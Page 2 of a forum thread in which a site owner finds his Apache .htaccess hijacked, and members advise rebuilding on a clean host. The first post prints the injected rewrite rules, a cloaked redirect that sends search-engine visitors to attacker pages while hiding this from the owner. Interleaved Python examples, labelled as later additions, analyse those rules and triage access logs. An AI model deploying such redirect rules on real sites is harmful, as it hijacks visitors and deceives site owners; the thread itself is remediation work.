Apache Web Server Forum

This 46 message thread spans 2 pages; this is page 2.
Htaccess hijacked.
dr0832
msg:4535612
5:33 am on Jan 13, 2013 (gmt 0)

Hi, I just noticed my website has been redirecting to a different website without my knowledge. The site is hosted on Luckyregister, which is basically Godaddy. My .htaccess is redirecting to http://example.com/hecs.html. When I looked at .htaccess there is also some Russian site, http://example.ru/mhos.html, which I assume has something to do with whoever did this.

Can anyone tell me exactly how to get rid of this and give me an example of the default code for the .htaccess file? I really have no clue about this sort of thing. I notice I have 3 .htaccess files that have the identical code below. Also I found 3 php files on my server (called default.php) that had some sort of encrypted code in them, and I read that these were somehow linked to the hack in my .htaccess file.

Also, if possible, I would like to add code to the default .htaccess so this can't happen again. Any help would be appreciated since I have no experience with any of this, yet more knowledge than the average person.

________________________________



RewriteEngine On
RewriteBase /
# Cond 1: capture the host part of the Referer as %1. Requests with no Referer
# (the owner typing the address) never match, so the owner never sees the redirect.
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
# Cond 2 (negated): fire only when that referring host is not this site, i.e. the
# visitor arrived from a search engine or another site's link.
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
# Redirect every such visitor to the attacker's page.
RewriteRule ^.*$ http://example.com/hecs.html?h=1127349 [L,R]



RewriteEngine On
RewriteBase /
# Same conditional redirect as above, pointing at a second attacker-controlled host.
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://example.ru/mhos.html [L,R]

[edited by: incrediBILL at 7:01 am (utc) on Jan 13, 2013]
[edit reason] fixed URLS, use Example.com [/edit]
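
What the posted rules actually do, as an added example written for this page (it is not code from the thread or from any poster). It transcribes the two RewriteCond patterns into Python so you can see which visitors the hijack redirects and which it leaves alone, and adds a small check that lists any RewriteRule in an .htaccess whose target is a host you do not own. The hostname www.victim.example and the copy of the hijacked file are constructed placeholders.

```python
import re
from typing import List, Optional, Set

# The two RewriteCond patterns from the hijacked .htaccess above, transcribed verbatim.
# Cond 1 (no NC flag, so case-sensitive): capture the referring host as %1.
REFERER_HOST = re.compile(r"^http://[w.]*([^/]+)")
# Cond 2 carries [NC]. Apache first expands "%{HTTP_HOST}/%1" to
# "<our host>/<referring host>", matches it against this pattern, and the
# leading "!" then negates the result.
SAME_HOST = re.compile(r"^[w.]*([^/]+)/\1$", re.IGNORECASE)


def hijack_fires(http_host: str, referer: Optional[str]) -> bool:
    """True when the posted RewriteRule would redirect this request."""
    m = REFERER_HOST.match(referer or "")
    if not m:
        # No Referer (typed URL, bookmark, most uptime monitors) or an https://
        # Referer: cond 1 fails, so the owner visiting directly never sees it.
        return False
    referring_host = m.group(1)
    # Negated cond 2: redirect unless the referrer is this very site.
    return SAME_HOST.match(f"{http_host}/{referring_host}") is None


# Any RewriteRule whose substitution is an absolute URL; the target host is group 1.
ABSOLUTE_TARGET = re.compile(r"^\s*RewriteRule\s+\S+\s+https?://([^/\s]+)", re.IGNORECASE)


def _bare(host: str) -> str:
    """Lower-case a hostname and drop a leading 'www.' so both spellings compare equal."""
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def external_redirects(htaccess_text: str, own_hosts: Set[str]) -> List[str]:
    """Return the RewriteRule lines that send visitors to a host you do not own."""
    own = {_bare(h) for h in own_hosts}
    suspicious = []
    for line in htaccess_text.splitlines():
        m = ABSOLUTE_TARGET.match(line)
        if m and _bare(m.group(1)) not in own:
            suspicious.append(line.strip())
    return suspicious


# Constructed copy of the first hijacked .htaccess posted above (placeholder hosts).
HIJACKED_HTACCESS = """\
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\\1$ [NC]
RewriteRule ^.*$ http://example.com/hecs.html?h=1127349 [L,R]
"""

if __name__ == "__main__":
    site = "www.victim.example"
    for ref in (None,
                "http://www.victim.example/index.html",
                "http://www.google.com/search?q=victim",
                "https://www.google.com/"):
        verdict = "REDIRECTED" if hijack_fires(site, ref) else "served normally"
        print(f"{ref!r:45} -> {verdict}")
    print(external_redirects(HIJACKED_HTACCESS, {site}))
```

The practical consequence is the one the thread keeps circling: the owner, who types the address or uses a bookmark, sends no Referer and is served the normal site, while visitors arriving from a search result are bounced to the attacker. To reproduce that from the outside, request a page once with no Referer and once with a Referer header set to a search engine, and compare the status codes. The same regex also shows why the rule misses some traffic: a Referer that starts with https:// does not match cond 1 at all.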

 

dr0832
msg:4536351
1:54 am on Jan 16, 2013 (gmt 0)

I plan to back up everything but I still don't know how to secure anything. Is a password or blocking an IP address or range of IPs a viable solution? Also, would using something like this be useful for creating a more secure .htaccess file?

wheel
msg:4536353
2:07 am on Jan 16, 2013 (gmt 0)

No and no. Blocking IPs will not fix the problem. And as I mentioned, forget the .htaccess file. That has basically nothing to do with security. The hackers apparently put that in so they could redirect your site, which is the kind of thing that .htaccess does (redirect, not secure).

The hackers almost certainly got in through one of three ways:
1) they got one of your passwords (so when you move hosting companies, change all your passwords).
2) they cracked a script on your website, so as I noted, start with a new version of any scripts. That assumes that if you're using a CMS or something, a new and clean version won't have the exploit (which is why I said don't use a backup).
3) they came in through your hosting company. And you've told us how much your hosting company.

Frankly, I think there's a pretty good chance they came in through your host. If not, they almost certainly came in through a script on your site. And the easiest way to mostly get this fixed is the procedure I outlined - start fresh elsewhere.

Let me be clear: if you want to stay on your host with your existing site then you need to bring in a pro to diagnose where the hacker got in. Nothing less will do. If you're not doing that, then you're just wasting your time. Otherwise, if you want a solution that's cheap and fast and is probably effective, follow the steps I outlined. It's what I'd do if I were on shared hosting. If you start now, you could be live and fixed somewhere by tomorrow rather than still figuring this stuff out. In other words, quit trying to figure out the problem and just go directly to the solution.

incrediBILL
msg:4536368
3:02 am on Jan 16, 2013 (gmt 0)

When you're hacked, blocking IPs is just a temporary crutch to stop a situation like a botnet sending you millions of emails to spam. It does not solve anything, only puts the problem on hold while you find a permanent solution, assuming they don't have multiple ways in and it doesn't auto-switch IPs when it notices it has lost contact, which the more sophisticated may do.

It's what I'd do if I was on shared hosting. If you start now, you could be live and fixed somewhere by tomorrow rather than still figuring this stuff out. In other words - quit trying to figure out the problem and just go directly to the solution.


Like wheel said.

If it were mine, I'd move to a new server IMMEDIATELY and make sure I had a clean software installation of any scripts I'm using before making it public again.

Mainly because in a shared server environment you can't be sure if it's the server that's hacked or just your account, and you can't trust server admins to know the difference or even tell the truth about it. I published about a hosting company a couple of years ago with about 50% of their accounts having a virus injector on their home pages, across multiple servers; it was a big mess and they were telling individual customers that they needed to change their FTP passwords. Yeah, right.

Anything short of moving to a 100% clean environment is just wasting your time and money, and if you do ecommerce, risking your customers' CC numbers and potentially your merchant account.

dr0832
msg:4536376
3:39 am on Jan 16, 2013 (gmt 0)

wilderness, what should be added to that to provide protection?

cabbie
msg:4536394
4:24 am on Jan 16, 2013 (gmt 0)

I have been hacked many times.
I would say about 50% of the time it's a vulnerability on my site and 50% it's the host's.
I guarantee though that the hosts deny responsibility 100% of the time!
Even when you point out other websites on their servers that have the same hack.
I recently had a hack on one of my better sites through a news feed, and the hack created a thousand .php pages promoting pills with a simple text file. He then used the same vulnerability on many other people's sites and created tens of thousands of links to those pages he created on my site.
I really only noticed when I got a jump in my main serps and an email in my webmaster tools account that I had a sudden increase in traffic and revenue.
All those thousands of extra links to those pill pages boosted my own mainstream serps.
I was almost reluctant to clean the hack and disavow the links :)
but I did, and my traffic and serps plummeted henceforth.
I saw no evidence that my pill pages were ranking.

wilderness
msg:4536397
4:35 am on Jan 16, 2013 (gmt 0)

what should be added to that to provide protection?


That may only be determined by reviewing your logs, and locating the point of intrusion.
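
One way to do that review. This is an added example for this page, not code from the thread: it parses Apache combined-format access-log lines and pulls out the three things that usually pin down the entry point on a site this small: requests for files that were never part of the site (such as the default.php files the poster found), POSTs to PHP scripts, and the first time a search-engine visitor was handed a redirect. The sample lines are constructed (documentation IP ranges, placeholder domain), and the five-page inventory in KNOWN_PATHS is an assumption about what the site contains.

```python
import re
from typing import Dict, Iterator, List, Optional, Tuple

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

# Assumed inventory of a five-page site plus the host-supplied contact script and a
# stylesheet. Anything requested outside this set either never existed or was put
# there by someone else.
KNOWN_PATHS = {"/", "/index.html", "/about.html", "/services.html", "/gallery.html",
               "/contact.html", "/contact.php", "/style.css"}

# Referer fragments that mark a visitor arriving from a search engine.
SEARCH_ENGINES = ("google.", "bing.", "yahoo.")

# Constructed sample lines (documentation IP ranges, placeholder domain), not real logs.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Jan/2013:02:14:03 +0000] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Jan/2013:02:14:09 +0000] "GET /contact.html HTTP/1.1" 200 2210 "http://www.victim.example/index.html" "Mozilla/5.0"
198.51.100.23 - - [11/Jan/2013:03:41:55 +0000] "POST /contact.php HTTP/1.1" 200 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.23 - - [11/Jan/2013:03:42:01 +0000] "GET /default.php HTTP/1.1" 200 82 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.23 - - [11/Jan/2013:03:42:20 +0000] "POST /default.php HTTP/1.1" 200 16 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.9 - - [12/Jan/2013:09:02:44 +0000] "GET /services.html HTTP/1.1" 302 255 "http://www.google.com/search?q=victim" "Mozilla/5.0"
"""


def parse(log_text: str) -> Iterator[Dict[str, str]]:
    """Yield one field dict per well-formed combined-log line; skip anything else."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def triage(log_text: str, known_paths=KNOWN_PATHS) -> dict:
    """Group the entries worth reading first when hunting for the point of intrusion.

    Relies on the log being in time order, as Apache writes it."""
    unknown: Dict[str, Tuple[str, str]] = {}          # path -> (first seen, client IP)
    php_posts: List[Tuple[str, str, str, str]] = []   # (time, ip, path, status)
    redirected: List[Tuple[str, str]] = []            # (time, path) of bounced search visitors
    for r in parse(log_text):
        path = r["path"].split("?", 1)[0]
        if path not in known_paths:
            # keep only the first sighting: that is the moment the file appeared (or was probed)
            unknown.setdefault(path, (r["time"], r["ip"]))
        if r["method"] == "POST" and path.endswith(".php"):
            php_posts.append((r["time"], r["ip"], path, r["status"]))
        if r["status"].startswith("30") and any(s in r["referer"] for s in SEARCH_ENGINES):
            # a search-engine visitor got a redirect: the hijacked .htaccess was live by now
            redirected.append((r["time"], path))
    return {"unknown_paths": unknown, "php_posts": php_posts, "redirected_from_search": redirected}


def first_unknown_request(log_text: str, known_paths=KNOWN_PATHS) -> Optional[Tuple[str, str, str]]:
    """(time, ip, path) of the earliest request for a file that was never part of the site."""
    unknown = triage(log_text, known_paths)["unknown_paths"]
    for path, (time, ip) in unknown.items():
        return (time, ip, path)
    return None


if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    for key, value in report.items():
        print(f"{key}:")
        for item in (value.items() if isinstance(value, dict) else value):
            print("   ", item)
    print("earliest foreign file:", first_unknown_request(SAMPLE_LOG))
```

Reading the result is the actual work: the client that POSTed to the contact script and, seconds later, fetched a default.php that did not exist before is the candidate entry point, and everything that client did afterwards, plus the timestamps of the .htaccess files on disk, should be compared against it. Run it over the full log history rather than the last day, since the redirect is only noticed long after the files were dropped.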

wilderness
msg:4536398
4:43 am on Jan 16, 2013 (gmt 0)

recap

I did have a php contact form I believe.


There aren't that many files on my website because its just about 5 pages in total.


This is surely the most participated thread in this forum in a very long while.

Many folks have provided valid insights.

Multiple folks have conveyed the urgency of determining the initial vulnerability.

Unfortunately folks are overlooking the simplicity of the site.

lucy24
msg:4536400
5:11 am on Jan 16, 2013 (gmt 0)

Unfortunately folks are overlooking the simplicity of the site.

That's why I asked about databases. Not all sites that look simple really are simple. This one probably is. (You "believe" you had a php contact form? Did you or didn't you? Did the hacker add one that wasn't there before, or delete one that you'd forgotten you had?)

Your site itself is probably not the target. But that's like saying that the burglar who broke into your basement apartment really did it to get easier access to the pricey penthouses-- and their pricey contents-- upstairs. You don't care about the penthouses; you just don't want to have to buy a new TV every other week.

To keep them from breaking in again, you have to maintain just as much security as if you did live in one of those attractive penthouses. And if the building owner can't figure out that the person who hacked into your expendable $9.95/month site is now on his way to the $995/month VPS that he really doesn't want to lose ... then it's time to move.


Second recap:

What changes have you made so far?

The original post was pretty exactly three days ago. That's time for a lot of things to get done.

what should be added to [the .htaccess file] to provide protection?

A padlock. There is nothing you can put in the htaccess itself that will prevent people from overwriting or editing the file; that's simply not what htaccess does.

Right now, it should say something like:

# Answer every request with 503 Service Unavailable while the site is being cleaned ("-" means no substitution).
RewriteRule .* - [R=503,L]

dr0832
msg:4536406
5:49 am on Jan 16, 2013 (gmt 0)

Yes, 3 days is time for things to get done for someone who knows how all this works. I am more computer literate than most people, but I don't know anything about hacking.

I actually had a couple of php files which were not actually being used. They were originally placed on my server by my host for an email contact page, but I didn't like how they worked so I stopped using them, but left the files. I have since deleted them. The contact page on my site has some form from www.jotform.com/ which I assume uses php. Whoever did this placed 3 other php files which had some sort of encrypted code. I have read other posts online where people also found these files, named differently, on their sites.

incrediBILL
msg:4536413
5:53 am on Jan 16, 2013 (gmt 0)

Unfortunately folks are overlooking the simplicity of the site.


That's why I assumed an infected server.

wilderness
msg:4536416
5:57 am on Jan 16, 2013 (gmt 0)

dr,
lucy was inquiring as to what changes have been made in the past three days (her comment was rhetorical and not meant as criticism).

wheel
msg:4536503
11:34 am on Jan 16, 2013 (gmt 0)

>>>>I plan to backup everything but I still don't know how to secure anything.

You aren't going to learn how to secure anything. Instead you're going to start with fresh software or fresh pages, on a fresh host. That leaves the vulnerability and exploit behind.

>>Also would using something like this be useful for creating a more secure .htaccess file?
Are you even reading this thread? The answer is no. Your htaccess file is not for security.

>>Is a password or blocking a ip address or range of ip's a viable solution?
Again, did you read the multiple posts in this thread about this? The answer again is no. Either find the vulnerability - and you can't because that takes a pro, or start with fresh software on a fresh host. You are not going to recieve an answer like 'they came in through this file, and therefore if you change line 18 the problem will be fixed'.

dr0832
msg:4536569
3:26 pm on Jan 16, 2013 (gmt 0)

wheel, thanks. You spoke my language. I was under the impression that it was possible to add code to the .htaccess that could help prevent it. I guess reading for hours upon hours online is not a good way to learn, because many people on other forums were mentioning adding specific lines to .htaccess to secure it. Thanks for your help.

Wizcrafts
msg:4536677
10:20 pm on Jan 16, 2013 (gmt 0)

The other people you referred to, on other forums, may have been referring to the 3 lines of code that can be added to prevent people from reading .htaccess files online, in their browsers. It is just like a Do Not Disturb sign to curious onlookers and is ignored if they possess a key to your virtual room (website). It has no effect if somebody has "Owner" write access to your website. There are only a few ways that can happen. One is if you somehow give up or are stripped of your (cpanel or ftp) login credentials, or if a server admin gives up the master credentials, or the server gets hacked through some other means and the hack affects all virtual hosts with accounts on that box.

What have you done thus-far to secure your website against further compromises?

Andem
msg:4536696
11:36 pm on Jan 16, 2013 (gmt 0)

Based on my experience, I would like to suggest that this sounds more like a service vulnerability than an issue with a PHP contact form, especially if the .htaccess file was edited. If it wasn't edited and just appeared/overwrote your old .htaccess file, then the contact form sounds like the likely culprit.

If your site really is only 5 html files and a contact form, I urge you to immediately move to a new host with a solid reputation. I'd also suggest getting rid of the contact form and finding something you can confirm is not currently vulnerable as a replacement, if need be.

lucy24
msg:4536730
1:53 am on Jan 17, 2013 (gmt 0)

I actually had a couple php files which were not actually being used . They were originally placed on my server by my host for an email contact page but I didn't like how they worked so I stopped using them, but left the files. I have since deleted them. The contact page on my site has some form from www.jotform.com/ which I assume uses php.

Do not allow anything to exist on your site that you don't understand. If you are big, your employees count as "you". Part of their job is to understand the things you don't. Part of your own job is to figure out when "understand" must be taken literally and when it can mean "I've got a general idea what this line does but don't ask me what 'preg' stands for".

If you're using material from outside sources, make sure it's an established source with an impeccable reputation.

:: idly wondering how many sites got hacked via third-party counters back when those were fashionable ::

For htaccess, consider this: You can easily put a few lines in htaccess to lock yourself out. I do it all the time when testing code. So how do you get back in? By editing or replacing the htaccess. The block you put in place can't prevent this from happening; it only prevents you from visiting your site in a browser.

"When in doubt, don't" is probably a safe guideline.
